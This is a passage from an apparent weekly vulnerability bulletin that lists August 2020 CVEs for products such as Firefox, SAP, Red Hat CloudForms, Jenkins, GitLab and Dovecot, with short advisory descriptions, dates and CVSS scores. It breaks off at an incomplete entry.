Lindy 42633 4-Port USB 2.0 Gigabit Network Server 2.078.000 devices allow an attacker on the same network to denial-of-service the device via long input values.
2020-08-07
6.1

CVE-2020-15061
MISC

mahara — mahara
In Mahara 19.04 before 19.04.6, 19.10 before 19.10.4, and 20.04 before 20.04.1, certain places could execute file or folder names containing JavaScript.
2020-08-07
4.3

CVE-2020-15907
MISC
MISC

mibew — messenger
Mibew Messenger before 3.2.7 allows XSS via a crafted user name.
2020-08-10
4.3

CVE-2020-17476
MISC
MISC

mozilla — firefox
A unicode RTL order character in the downloaded file name can be used to change the file’s name during the download UI flow to change the file extension. This vulnerability affects Firefox for iOS < 28.
2020-08-10
4.3

CVE-2020-15651
MISC
MISC

mozilla — firefox
A rogue webpage could override the injected WKUserScript used by the logins autofill, this exploit could result in leaking a password for the current domain. This vulnerability affects Firefox for iOS < 28.
2020-08-10
4.3

CVE-2020-15661
MISC
MISC

mozilla — firefox
The code for downloading files did not properly take care of special characters, which led to an attacker being able to cut off the file ending at an earlier position, leading to a different file type being downloaded than shown in the dialog. This vulnerability affects Firefox ESR < 78.1, Firefox < 79, and Thunderbird < 78.1.
2020-08-10
4.3

CVE-2020-15658
SUSE
MISC
MISC
MISC
MISC

mozilla — firefox
A redirected HTTP request which is observed or modified through a web extension could bypass existing CORS checks, leading to potential disclosure of cross-origin information. This vulnerability affects Firefox ESR < 78.1, Firefox < 79, and Thunderbird < 78.1.
2020-08-10
4.3

CVE-2020-15655
SUSE
MISC
MISC
MISC
MISC

mozilla — firefox
When in an endless loop, a website specifying a custom cursor using CSS could make it look like the user is interacting with the user interface, when they are not. This could lead to a perceived broken state, especially when interactions with existing browser dialogs and warnings do not work. This vulnerability affects Firefox ESR < 78.1, Firefox < 79, and Thunderbird < 78.1.
2020-08-10
4.3

CVE-2020-15654
SUSE
MISC
MISC
MISC
MISC

mozilla — firefox
By observing the stack trace for JavaScript errors in web workers, it was possible to leak the result of a cross-origin redirect. This applied only to content that can be parsed as script. This vulnerability affects Firefox < 79, Firefox ESR < 68.11, Firefox ESR < 78.1, Thunderbird < 68.11, and Thunderbird < 78.1.
2020-08-10
4.3

CVE-2020-15652
SUSE
SUSE
SUSE
MISC
MISC
MISC
MISC
MISC
MISC

mozilla — firefox
A rogue webpage could override the injected WKUserScript used by the download feature, this exploit could result in the user downloading an unintended file. This vulnerability affects Firefox for iOS < 28.
2020-08-10
4.3

CVE-2020-15662
MISC
MISC

mozilla — firefox
An iframe sandbox element with the allow-popups flag could be bypassed when using noopener links. This could have led to security issues for websites relying on sandbox configurations that allowed popups and hosted arbitrary content. This vulnerability affects Firefox ESR < 78.1, Firefox < 79, and Thunderbird < 78.1.
2020-08-10
4.3

CVE-2020-15653
SUSE
MISC
MISC
MISC
MISC

mozilla — firefox
Firefox could be made to load attacker-supplied DLL files from the installation directory. This required an attacker that is already capable of placing files in the installation directory. *Note: This issue only affected Windows operating systems. Other operating systems are unaffected.*. This vulnerability affects Firefox ESR < 78.1, Firefox < 79, and Thunderbird < 78.1.
2020-08-10
6.9

CVE-2020-15657
SUSE
MISC
MISC
MISC
MISC

mozilla — firefox
Using object or embed tags, it was possible to frame other websites, even if they disallowed framing using the X-Frame-Options header. This vulnerability affects Thunderbird < 78 and Firefox < 78.0.2.
2020-08-10
4.3

CVE-2020-15648
MISC
MISC
MISC

mozilla — firefox
A Content Provider in Firefox for Android allowed local files accessible by the browser to be read by a remote webpage, leading to sensitive data disclosure, including cookies for other origins. This vulnerability affects Firefox for < Android.
2020-08-10
5

CVE-2020-15647
MISC
MISC

mozilla — firefox_esr
Given an installed malicious file picker application, an attacker was able to overwrite local files and thus overwrite Firefox settings (but not access the previous profile). *Note: This issue only affected Firefox for Android. Other operating systems are unaffected.*. This vulnerability affects Firefox ESR < 68.11.
2020-08-10
4.3

CVE-2020-15650
MISC
MISC

mozilla — firefox_esr
Given an installed malicious file picker application, an attacker was able to steal and upload local files of their choosing, regardless of the actually files picked. *Note: This issue only affected Firefox for Android. Other operating systems are unaffected.*. This vulnerability affects Firefox ESR < 68.11.
2020-08-10
4.3

CVE-2020-15649
MISC
MISC

mybb — mybb
MyBB before 1.8.24 allows XSS because the visual editor mishandles [align], [size], [quote], and [font] in MyCode.
2020-08-09
4.3

CVE-2020-17447
MISC
MISC

mybb — mybb
In MyBB before version 1.8.24, the custom MyCode (BBCode) for the visual editor doesn’t escape input properly when rendering HTML, resulting in a DOM-based XSS vulnerability. The weakness can be exploited by pointing a victim to a page where the visual editor is active (e.g. as a post or Private Message) and operates on a maliciously crafted MyCode message. This may occur on pages where message content is pre-filled using a GET/POST parameter, or on reply pages where a previously saved malicious message is quoted. After upgrading MyBB to 1.8.24, make sure to update the version attribute in the `codebuttons` template for non-default themes to serve the latest version of the patched `jscripts/bbcodes_sceditor.js` file.
2020-08-10
4.3

CVE-2020-15139
MISC
CONFIRM
MISC

nextcloud — nextcloud
A code injection in Nextcloud Desktop Client 2.6.4 allowed to load arbitrary code when placing a malicious OpenSSL config into a fixed directory.
2020-08-10
4.6

CVE-2020-8224
MISC
MISC

nextcloud — nextcloud
A memory leak in the OCUtil.dll library used by Nextcloud Desktop Client 2.6.4 can lead to a DoS against the host system.
2020-08-10
4.9

CVE-2020-8229
MISC
MISC

nginx — njs
njs through 0.4.3, used in NGINX, has a use-after-free in njs_json_parse_iterator_call in njs_json.c.
2020-08-13
6.8

CVE-2020-24346
MISC

p5-crypt-perl_project — p5-crypt-perl
ECDSA/EC/Point.pm in Crypt::Perl before 0.33 does not properly consider timing attacks against the EC point multiplication algorithm.
2020-08-10
5

CVE-2020-17478
MISC

php-fusion — php-fusion
PHP-Fusion 9.03 allows XSS on the preview page.
2020-08-12
4.3

CVE-2020-17450
MISC

prometheus — blackbox_exporter
** DISPUTED ** Prometheus Blackbox Exporter through 0.17.0 allows /probe?target= SSRF. NOTE: follow-on discussion suggests that this might plausibly be interpreted as both intended functionality and also a vulnerability.
2020-08-09
5

CVE-2020-16248
MISC
MISC
MISC
MISC
MISC

qemu — qemu
In QEMU through 5.0.0, an assertion failure can occur in the network packet processing. This issue affects the e1000e and vmxnet3 network devices. A malicious guest user/process could use this flaw to abort the QEMU process on the host, resulting in a denial of service condition in net_tx_pkt_add_raw_fragment in hw/net/net_tx_pkt.c.
2020-08-11
5

CVE-2020-16092
MISC
MISC

redhat — cloudforms
Red Hat CloudForms 4.7 and 5 is affected by a role-based privilege escalation flaw. An attacker with EVM-Operator group can perform actions restricted only to EVM-Super-administrator group, leads to, exporting or importing administrator files.
2020-08-11
6.5

CVE-2020-10783
MISC
MISC

redhat — cloudforms
In Red Hat CloudForms 4.7 and 5, the read only widgets can be edited by inspecting the forms and dropping the disabled attribute from the fields since there is no server-side validation. This business logic flaw violate the expected behavior.
2020-08-11
6.5

CVE-2020-10778
MISC
MISC

redhat — cloudforms
Red Hat CloudForms 4.7 and 5 leads to insecure direct object references (IDOR) and functional level access control bypass due to missing privilege check. Therefore, if an attacker knows the right criteria, it is possible to access some sensitive data within the CloudForms.
2020-08-11
4

CVE-2020-10779
MISC
MISC

redhat — cloudforms
Red Hat CloudForms before 5.11.7.0 was vulnerable to the User Impersonation authorization flaw which allows malicious attacker to create existent and non-existent role-based access control user, with groups and roles. With a selected group of EvmGroup-super_administrator, an attacker can perform any API request as a super administrator.
2020-08-11
6.4

CVE-2020-14325
MISC
MISC

redhat — cloudforms_management_engine
Red Hat CloudForms 4.7 and 5 is affected by CSV Injection flaw, a crafted payload stays dormant till a victim export as CSV and opens the file with Excel. Once the victim opens the file, the formula executes, triggering any number of possible events. While this is strictly not an flaw that affects the application directly, attackers could use the loosely validated parameters to trigger several attack possibilities.
2020-08-11
6.8

CVE-2020-10780
MISC
MISC

redhat — cloudforms_management_engine
A high severity vulnerability was found in all active versions of Red Hat CloudForms before 5.11.7.0. The out of band OS command injection vulnerability can be exploited by authenticated attacker while setuping conversion host through Infrastructure Migration Solution. This flaw allows attacker to execute arbitrary commands on CloudForms server.
2020-08-11
6.5

CVE-2020-14324
MISC
MISC

redhat — cloudforms_management_engine
Red Hat CloudForms 4.7 and 5 was vulnerable to Server-Side Request Forgery (SSRF) flaw. With the access to add Ansible Tower provider, an attacker could scan and attack systems from the internal network which are not normally accessible.
2020-08-11
5.5

CVE-2020-14296
MISC
MISC

redhat — quay
An information disclosure vulnerability was found in Red Hat Quay in versions before 3.3.1. This flaw allows an attacker who can create a build trigger in a repository, to disclose the names of robot accounts and the existence of private repositories within any namespace.
2020-08-11
5

CVE-2020-14313
MISC

robotemi — launcher_os
Missing Authentication for Critical Function in Robotemi Global Ltd Temi Firmware up to 20190419.165201, Launcher OS prior to 11969-13146, Robox OS prior to 117.21-119.24, and their Android phone app prior to 1.3.3-1.3.7931 allows remote attackers to receive and answer calls intended for another temi user. Answering the call this way grants motor control of the temi in addition to audio/video.
2020-08-07
6.4

CVE-2020-16167
MISC
MISC

robotemi — temi_firmware
Origin Validation Error in Robotemi Global Ltd Temi Firmware up to 20190419.165201, Launcher OS prior to 11969-13146, Robox OS prior to 117.21-119.24, and their Android phone app prior to 1.3.3-1.3.7931 allows remote attackers to access the custom API server and MQTT broker used by the temi and send it custom data/requests.
2020-08-07
4.3

CVE-2020-16168
MISC
MISC

roundcube — webmail
Roundcube Webmail before 1.4.8 allows stored XSS in HTML messages during message display via a crafted SVG document.
2020-08-12
4.3

CVE-2020-16145
CONFIRM
MISC

sabnzbd — sabnzbd
SABnzbd 2.3.9 and 3.0.0Alpha2 has a command injection vulnerability in the web configuration interface that permits an authenticated user to execute arbitrary Python commands on the underlying operating system.
2020-08-11
6.5

CVE-2020-13124
MISC
CONFIRM
MISC

sap — abap_platform
SAP NetWeaver (ABAP Server) and ABAP Platform, versions – 740, 750, 751, 752, 753, 754, 755, allows a business user to access the list of users in the given system using value help, leading to Information Disclosure.
2020-08-12
4

CVE-2020-6299
MISC
MISC

sap — abap_platform
Improper access control in SOA Configuration Trace component in SAP NetWeaver (ABAP Server) and ABAP Platform, versions – 702, 730, 731, 740, 750, allows any authenticated user to enumerate all SAP users, leading to Information Disclosure.
2020-08-12
4

CVE-2020-6310
MISC
MISC

sap — abap_platform
SAP NetWeaver (ABAP Server) and ABAP Platform, versions – 700, 701, 702, 710, 711, 730, 731, 740, 750, 751, 753, 755, allows an attacker to inject code that can be executed by the application, leading to Code Injection. An attacker could thereby control the behavior of the application.
2020-08-12
6.5

CVE-2020-6296
MISC
MISC

sap — adaptive_server_enterprise
Under certain conditions the SAP Adaptive Server Enterprise, version 16.0, allows an attacker to access encrypted sensitive and confidential information through publicly readable installation log files leading to a compromise of the installed Cockpit. This compromise could enable the attacker to view, modify and/or make unavailable any data associated with the Cockpit, leading to Information Disclosure.
2020-08-12
4.6

CVE-2020-6295
MISC
MISC

sap — businessobjects_business_intelligence_platform
Xvfb of SAP Business Objects Business Intelligence Platform, versions – 4.2, 4.3, platform on Unix does not perform any authentication checks for functionalities that require user identity.
2020-08-12
6.4

CVE-2020-6294
MISC
MISC

sap — generic_market_data
SAP Banking Services (Generic Market Data), versions – 400, 450, 500, allows an unauthorized user to display protected Business Partner Generic Market Data (GMD) and change related GMD key figure values, due to Missing Authorization Check.
2020-08-12
5.5

CVE-2020-6298
MISC
MISC

sap — hcm_travel_management
SAP ERP (HCM Travel Management), versions – 600, 602, 603, 604, 605, 606, 607, 608, allows an authenticated but unauthorized attacker to read, modify and settle trips, resulting in escalation of privileges, due to Missing Authorization Check.
2020-08-12
5.5

CVE-2020-6301
MISC
MISC

sap — netweaver_knowledge_management
SAP NetWeaver (Knowledge Management), versions – 7.30, 7.31, 7.40, 7.50, allows an unauthenticated attacker to upload a malicious file and also to access, modify or make unavailable existing files but the impact is limited to the files themselves and is restricted by other policies such as access control lists and other upload file size restrictions, leading to Unrestricted File Upload.
2020-08-12
6.4

CVE-2020-6293
MISC
MISC

sap — s/4_hana_fiori_ui_for_general_ledger_accounting
SAP S/4 HANA (Fiori UI for General Ledger Accounting), versions 103, 104, does not perform necessary authorization checks for an authenticated user working with attachment service, allowing the attacker to delete attachments due to Missing Authorization Check.
2020-08-12
4

CVE-2020-6273
MISC
MISC

sophos — xg_firewall_firmware
Two OS command injection vulnerabilities in the User Portal of Sophos XG Firewall through 2020-08-05 potentially allow an authenticated attacker to remotely execute arbitrary code.
2020-08-07
6.5

CVE-2020-17352
MISC
MISC

suse — linux_enterprise_high_performance_computing
A Incorrect Execution-Assigned Permissions vulnerability in the permissions package of SUSE Linux Enterprise Server 12-SP4, SUSE Linux Enterprise Server 15-LTSS, SUSE Linux Enterprise Server for SAP 15; openSUSE Leap 15.1, openSUSE Tumbleweed sets the permissions for some of the directories of the pcp package to unintended settings. This issue affects: SUSE Linux Enterprise Server 12-SP4 permissions versions prior to 20170707-3.24.1. SUSE Linux Enterprise Server 15-LTSS permissions versions prior to 20180125-3.27.1. SUSE Linux Enterprise Server for SAP 15 permissions versions prior to 20180125-3.27.1. openSUSE Leap 15.1 permissions versions prior to 20181116-lp151.4.24.1. openSUSE Tumbleweed permissions versions prior to 20200624.
2020-08-07
4.6

CVE-2020-8025
CONFIRM

telegram — telegram_desktop
Telegram Desktop through 2.1.13 allows a spoofed file type to bypass the Dangerous File Type Execution protection mechanism, as demonstrated by use of the chat window with a filename that lacks an extension.
2020-08-11
6.8

CVE-2020-17448
MISC
MISC
MISC

teradici — cloud_access_connector
The Management Interface of the Teradici Cloud Access Connector and Cloud Access Connector Legacy for releases prior to April 24, 2020 (v16 and earlier for the Cloud Access Connector) contains a stored cross-site scripting (XSS) vulnerability which allows a remote unauthenticated attacker to poison log files with malicious JavaScript via the login page which is executed when an administrator views the logs within the application.
2020-08-11
4.3

CVE-2020-13176
MISC

teradici — cloud_access_connector
The Management Interface of the Teradici Cloud Access Connector and Cloud Access Connector Legacy for releases prior to April 20, 2020 (v15 and earlier for Cloud Access Connector) contains a local file inclusion vulnerability which allows an unauthenticated remote attacker to leak LDAP credentials via a specially crafted HTTP request.
2020-08-11
5

CVE-2020-13175
MISC

teradici — graphics_agent
The support bundler in Teradici PCoIP Standard Agent for Windows and Graphics Agent for Windows versions prior to 20.04.1 and 20.07.0 does not use hard coded paths for certain Windows binaries, which allows an attacker to gain elevated privileges via execution of a malicious binary placed in the system path.
2020-08-11
4.4

CVE-2020-13177
MISC

teradici — graphics_agent
A function in the Teradici PCoIP Standard Agent for Windows and Graphics Agent for Windows prior to version 20.04.1 does not properly validate the signature of an external binary, which could allow an attacker to gain elevated privileges via execution in the context of the PCoIP Agent process.
2020-08-11
4.6

CVE-2020-13178
MISC

teradici — managament_console
The web server in the Teradici Managament console versions 20.04 and 20.01.1 did not properly set the X-Frame-Options HTTP header, which could allow an attacker to trick a user into clicking a malicious link via clickjacking.
2020-08-11
4.3

CVE-2020-13174
MISC

themeinprogress — nova_lite
search.php in the Nova Lite theme before 1.3.9 for WordPress allows Reflected XSS.
2020-08-12
4.3

CVE-2020-17362
CONFIRM

tibco — silver_fabric
The VirtualRouter component of TIBCO Software Inc.’s TIBCO Silver Fabric contains a vulnerability that theoretically allows an attacker to inject scripts via URLs. The attacker could theoretically social engineer an authenticated user into submitting the URL, thus executing the script on the affected system with the privileges of the user. Affected releases are TIBCO Software Inc.’s TIBCO Silver Fabric: versions 6.0.0 and below.
2020-08-11
5.8

CVE-2019-17339
CONFIRM

tiny — tinymce
A cross-site scripting (XSS) vulnerability in TinyMCE 5.2.1 and earlier allows remote attackers to inject arbitrary web script when configured in classic editing mode.
2020-08-14
4.3

CVE-2020-12648
MISC

tiny — tinymce
TinyMCE before 4.9.7 and 5.x before 5.1.4 allows XSS in the core parser, the paste plugin, and the visualchars plugin by using the clipboard or APIs to insert content into the editor.
2020-08-10
4.3

CVE-2020-17480
MISC
MISC

tp-link — tl-ps310u_firmware
TP-Link USB Network Server TL-PS310U devices before 2.079.000.t0210 allow an attacker on the same network to denial-of-service the device via long input values.
2020-08-07
6.1

CVE-2020-15057
MISC

vmware — spring_cloud_netflix
Spring Cloud Netflix, versions 2.2.x prior to 2.2.4, versions 2.1.x prior to 2.1.6, and older unsupported versions allow applications to use the Hystrix Dashboard proxy.stream endpoint to make requests to any server reachable by the server hosting the dashboard. A malicious user, or attacker, can send a request to other servers that should not be exposed publicly.
2020-08-07
4

CVE-2020-5412
CONFIRM

Back to top

 

Low Vulnerabilities

Primary
Vendor — Product
Description
Published
CVSS Score
Source & Patch Info

combodo — itop
Combodo iTop contains a stored Cross-site Scripting vulnerability, which can be attacked by uploading file with malicious script.
2020-08-10
3.5

CVE-2020-12779
MISC

digitus — da-70254_firmware
DIGITUS DA-70254 4-Port Gigabit Network Hub 2.073.000.E0008 devices allow an attacker on the same network to conduct persistent XSS attacks by leveraging administrative privileges to set a crafted server name.
2020-08-07
2.3

CVE-2020-15064
MISC

digitus — da-70254_firmware
DIGITUS DA-70254 4-Port Gigabit Network Hub 2.073.000.E0008 devices allow an attacker on the same network to elevate privileges because the administrative password can be discovered by sniffing unencrypted UDP traffic.
2020-08-07
3.3

CVE-2020-15062
MISC

flatcore — flatcore
flatCore before 1.5.7 allows XSS by an admin via the acp/acp.php?tn=pages&sub=edit&editpage=1 page_linkname, page_title, page_content, or page_extracontent parameter, or the acp/acp.php?tn=system&sub=sys_pref prefs_pagename, prefs_pagetitle, or prefs_pagesubtitle parameter.
2020-08-09
3.5

CVE-2020-17451
MISC
MISC

gitlab — gitlab
For GitLab before 13.0.12, 13.1.6, 13.2.3 a cross-site scripting vulnerability exists in the issues list via milestone title.
2020-08-13
3.5

CVE-2020-13283
CONFIRM
MISC
MISC

gitlab — gitlab
For GitLab before 13.0.12, 13.1.6, 13.2.3 a cross-site scripting vulnerability exists in the issue reference number tooltip.
2020-08-13
3.5

CVE-2020-13285
CONFIRM
MISC
MISC

gitlab — gitlab
In GitLab before 13.0.12, 13.1.6, and 13.2.3, a stored XSS vulnerability exists in the CI/CD Jobs page
2020-08-12
3.5

CVE-2020-13288
CONFIRM
MISC
MISC

jenkins — jenkins
Jenkins 2.251 and earlier, LTS 2.235.3 and earlier does not escape the tooltip content of help icons, resulting in a stored cross-site scripting (XSS) vulnerability.
2020-08-12
3.5

CVE-2020-2229
MLIST
CONFIRM

jenkins — jenkins
Jenkins 2.251 and earlier, LTS 2.235.3 and earlier does not escape the project naming strategy description, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by users with Overall/Manage permission.
2020-08-12
3.5

CVE-2020-2230
MLIST
CONFIRM

jenkins — jenkins
Jenkins 2.251 and earlier, LTS 2.235.3 and earlier does not escape the remote address of the host starting a build via ‘Trigger builds remotely’, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by users with Job/Configure permission or knowledge of the Authentication Token.
2020-08-12
3.5

CVE-2020-2231
MLIST
CONFIRM

jenkins — yet_another_build_visualizer
Jenkins Yet Another Build Visualizer Plugin 1.11 and earlier does not escape tooltip content, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by users with Run/Update permission.
2020-08-12
3.5

CVE-2020-2236
MLIST
CONFIRM

lindy-international — 42633_firmware
Lindy 42633 4-Port USB 2.0 Gigabit Network Server 2.078.000 devices allow an attacker on the same network to elevate privileges because the administrative password can be discovered by sniffing unencrypted UDP traffic.
2020-08-07
3.3

CVE-2020-15058
MISC

lindy-international — 42633_firmware
Lindy 42633 4-Port USB 2.0 Gigabit Network Server 2.078.000 devices allow an attacker on the same network to conduct persistent XSS attacks by leveraging administrative privileges to set a crafted server name.
2020-08-07
2.3

CVE-2020-15060
MISC

mcafee — data_loss_prevention
Unprotected Storage of Credentials vulnerability in McAfee Data Loss Prevention (DLP) for Mac prior to 11.5.2 allows local users to gain access to the RiskDB username and password via unprotected log files containing plain text credentials.
2020-08-13
2.1

CVE-2020-7307
MISC

mcafee — data_loss_prevention
Cross Site scripting vulnerability in McAfee Data Loss Prevention (DLP) ePO extension prior to 11.5.3 allows authenticated remote user to trigger scripts to run in a user’s browser via adding a new label.
2020-08-13
2.3

CVE-2020-7303
MISC

pactware — pactware
In PACTware before 4.1 SP6 and 5.x before 5.0.5.31, passwords are stored in a recoverable format, and may be retrieved by any user with access to the PACTware workstation.
2020-08-11
2.1

CVE-2020-9403
CONFIRM

php-fusion — php-fusion
PHP-Fusion 9.03 allows XSS via the error_log file.
2020-08-12
3.5

CVE-2020-17449
MISC

redhat — cloudforms
A cross-site scripting flaw was found in Report Menu feature of Red Hat CloudForms 4.7 and 5. An attacker could use this flaw to execute a stored XSS attack on an application administrator using CloudForms.
2020-08-11
3.5

CVE-2020-10777
MISC
MISC

sap — businessobjects_business_intelligence_platform
SAP Business Objects Business Intelligence Platform (Central Management Console), versions- 4.2, 4.3, allows an attacker with administrator rights can use the web application to send malicious code to a different end user (victim), as it does not sufficiently encode user-controlled inputs for RecycleBin, resulting in Stored Cross-Site Scripting (XSS) vulnerability.
2020-08-12
3.5

CVE-2020-6300
MISC
MISC

sap — data_intelligence
Under certain conditions the upgrade of SAP Data Hub 2.7 to SAP Data Intelligence, version – 3.0, allows an attacker to access confidential system configuration information, that should otherwise be restricted, leading to Information Disclosure.
2020-08-12
2.1

CVE-2020-6297
MISC
MISC

soplanning — soplanning
SOPlanning 1.46.01 allows persistent XSS via the Project Name, Statutes Comment, Places Comment, or Resources Comment field.
2020-08-11
3.5

CVE-2020-15597
MISC
MISC

sugarcrm — sugarcrm
SugarCRM before 10.1.0 (Q3 2020) allows SQL Injection.
2020-08-12
3.5

CVE-2020-17373
MISC
MISC
MISC
MISC
MISC

sugarcrm — sugarcrm
SugarCRM before 10.1.0 (Q3 2020) allows XSS.
2020-08-12
3.5

CVE-2020-17372
MISC
MISC
MISC
MISC
MISC

teradici — graphics_agent
Broker Protocol messages in Teradici PCoIP Standard Agent for Windows and Graphics Agent for Windows prior to 20.04.1 are not cleaned up in server memory, which may allow an attacker to read confidential information from a memory dump via forcing a crashing during the single sign-on procedure.
2020-08-11
2.1

CVE-2020-13179
MISC

tp-link — tl-ps310u_firmware
TP-Link USB Network Server TL-PS310U devices before 2.079.000.t0210 allow an attacker on the same network to elevate privileges because the administrative password can be discovered by sniffing unencrypted UDP traffic.
2020-08-07
3.3

CVE-2020-15054
MISC

tp-link — tl-ps310u_firmware
TP-Link USB Network Server TL-PS310U devices before 2.079.000.t0210 allow an attacker on the same network to conduct persistent XSS attacks by leveraging administrative privileges to set a crafted server name.
2020-08-07
2.3

CVE-2020-15056
MISC

Back to top

 

Severity Not Yet Assigned

Primary
Vendor — Product
Description
Published
CVSS Score
Source & Patch Info

abbyy — finereader
 
ABBYY network license server in ABBYY FineReader 15 before Release 4 (aka 15.0.112.2130) allows escalation of privileges by local users via manipulations involving files and using symbolic links.
2020-08-13
not yet calculated

CVE-2019-20383
CONFIRM
MISC
CONFIRM

adobe — git-server
 
The resolveRepositoryPath function doesn’t properly validate user input and a malicious user may traverse to any valid Git repository outside the repoRoot. This issue may lead to unauthorized access of private Git repositories as long as the malicious user knows or brute-forces the location of the repository.
2020-08-14
not yet calculated

CVE-2020-9708
MISC

alps_alpine — touchpad_driver
The ALPS ALPINE touchpad driver before 8.2206.1717.634, as used on various Dell, HP, and Lenovo laptops, allows attackers to conduct Path Disclosure attacks via a “fake” DLL file.
2020-08-12
not yet calculated

CVE-2020-15596
MISC
MISC

amazon_web_services — s3_crypto_sdk_for_golang
 
A padding oracle vulnerability exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. The SDK allows users to encrypt files with AES-CBC without computing a Message Authentication Code (MAC), which then allows an attacker who has write access to the target’s S3 bucket and can observe whether or not an endpoint with access to the key can decrypt a file, they can reconstruct the plaintext with (on average) 128*length (plaintext) queries to the endpoint, by exploiting CBC’s ability to manipulate the bytes of the next block and PKCS5 padding errors. It is recommended to update your SDK to V2 or later, and re-encrypt your files.
2020-08-11
not yet calculated

CVE-2020-8911
CONFIRM
CONFIRM

amazon_web_services — s3_crypto_sdk_for_golang
 
A vulnerability in the in-band key negotiation exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. An attacker with write access to the targeted bucket can change the encryption algorithm of an object in the bucket, which can then allow them to change AES-GCM to AES-CTR. Using this in combination with a decryption oracle can reveal the authentication key used by AES-GCM as decrypting the GMAC tag leaves the authentication key recoverable as an algebraic equation. It is recommended to update your SDK to V2 or later, and re-encrypt your files.
2020-08-11
not yet calculated

CVE-2020-8912
CONFIRM
CONFIRM

artica — web_proxy
Artica Web Proxy 4.30.000000 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform.
2020-08-12
not yet calculated

CVE-2020-17505
MISC

artica — web_proxy
 
Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.
2020-08-12
not yet calculated

CVE-2020-17506
MISC
MISC

artifex_software — ghostscript
 
A division by zero vulnerability in dot24_print_page() in devices/gdevdm24.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.
2020-08-13
not yet calculated

CVE-2020-16310
MISC
MISC

artifex_software — ghostscript
 
A null pointer dereference vulnerability in devices/vector/gdevtxtw.c and psi/zbfont.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted postscript file. This is fixed in v9.51.
2020-08-13
not yet calculated

CVE-2020-16307
MISC
MISC

artifex_software — ghostscript
 
A null pointer dereference vulnerability in devices/gdevtsep.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted postscript file. This is fixed in v9.51.
2020-08-13
not yet calculated

CVE-2020-16306
MISC
MISC

artifex_software — mujs
 
Artifex MuJS through 1.0.7 has a use-after-free in jsrun.c because of unconditional marking in jsgc.c.
2020-08-13
not yet calculated

CVE-2020-24343
MISC

asyncpg — asyncpg
 
asyncpg before 0.21.0 allows a malicious PostgreSQL server to trigger a crash or execute arbitrary code (on a database client) via a crafted server response, because of access to an uninitialized pointer in the array data decoder.
2020-08-12
not yet calculated

CVE-2020-17446
CONFIRM

avaya — aura_communication_manager_and_aura_messaging
 
A Cross-Site Request Forgery (CSRF) vulnerability was discovered in the System Management Interface Web component of Avaya Aura Communication Manager and Avaya Aura Messaging. This vulnerability could allow an unauthenticated remote attacker to perform Web administration actions with the privileged level of the authenticated user. Affected versions of Communication Manager are 7.0.x, 7.1.x prior to 7.1.3.5 and 8.0.x. Affected versions of Messaging are 7.0.x, 7.1 and 7.1 SP1.
2020-08-11
not yet calculated

CVE-2020-7029
CONFIRM

blackberry — qnx_software_development_platform
 
An information disclosure and remote code execution vulnerability in the slinger web server of the BlackBerry QNX Software Development Platform versions 6.4.0 to 6.6.0 could allow an attacker to potentially read arbitrary files and run arbitrary executables in the context of the web server.
2020-08-12
not yet calculated

CVE-2020-6932
MISC

cisco — unified_ip_conference_station_7937g
 
** UNSUPPORTED WHEN ASSIGNED ** A denial-of-service in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers restart the device remotely through sending specially crafted packets. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE’s reference information.
2020-08-12
not yet calculated

CVE-2020-16139
MISC
MISC
MISC

cisco — unified_ip_conference_station_7937g
 
** UNSUPPORTED WHEN ASSIGNED ** A denial-of-service issue in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to remotely disable the device until it is power cycled. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE’s reference information.
2020-08-12
not yet calculated

CVE-2020-16138
MISC
MISC
MISC

cisco — unified_ip_conference_station_7937g
 
** UNSUPPORTED WHEN ASSIGNED ** A privilege escalation issue in Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to reset the credentials for the SSH administrative console to arbitrary values. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. For more information on this, and how to upgrade, refer to the CVE’s reference information.
2020-08-12
not yet calculated

CVE-2020-16137
MISC
MISC
MISC

cms_made_simple — cms_made_simple
 
CMS Made Simple 2.2.14 allows Authenticated Arbitrary File Upload because the File Manager does not block .ptar files, a related issue to CVE-2017-16798.
2020-08-14
not yet calculated

CVE-2020-17462
EXPLOIT-DB

documalis — free_pdf_editor_and_free_pdf_scanner
 
Documalis Free PDF Editor version 5.7.2.26 and Documalis Free PDF Scanner version 5.7.2.122 do not appropriately validate the contents of JPEG images contained within a PDF. Attackers can exploit this vulnerability to trigger a buffer overflow on the stack and gain remote code execution as the user running the Documalis Free PDF Editor or Documalis Free PDF Scanner software.
2020-08-12
not yet calculated

CVE-2020-7374
MISC

dovecot — dovecot
 
In Dovecot before 2.3.11.3, sending a specially formatted RPA request will crash the auth service because a length of zero is mishandled.
2020-08-12
not yet calculated

CVE-2020-12674
MISC
MLIST
DEBIAN
CONFIRM

dovecot — dovecot
 
In Dovecot before 2.3.11.3, sending a specially formatted NTLM request will crash the auth service because of an out-of-bounds read.
2020-08-12
not yet calculated

CVE-2020-12673
MISC
MLIST
DEBIAN
CONFIRM

dovecot — dovecot
 
In Dovecot before 2.3.11.3, uncontrolled recursion in submission, lmtp, and lda allows remote attackers to cause a denial of service (resource consumption) via a crafted e-mail message with deeply nested MIME parts.
2020-08-12
not yet calculated

CVE-2020-12100
MLIST
MISC
MLIST
DEBIAN

eaton — secure_connect_mobile_app
 
